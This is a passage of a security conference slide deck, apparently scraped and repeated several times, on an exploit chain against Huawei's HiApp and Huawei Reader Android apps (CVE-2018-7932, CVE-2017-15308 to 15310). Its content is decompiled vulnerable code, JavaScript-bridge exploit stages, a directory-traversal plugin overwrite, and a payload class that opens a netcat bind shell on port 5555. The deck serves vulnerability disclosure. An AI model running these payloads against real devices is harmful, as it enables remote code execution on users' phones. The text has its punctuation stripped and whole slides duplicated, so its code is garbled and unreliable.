String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 33: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/33.jpg)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 34: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/34.jpg)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 35: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/35.jpg)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 36: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/36.jpg)
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 37: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/37.jpg)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 38: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/38.jpg)
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
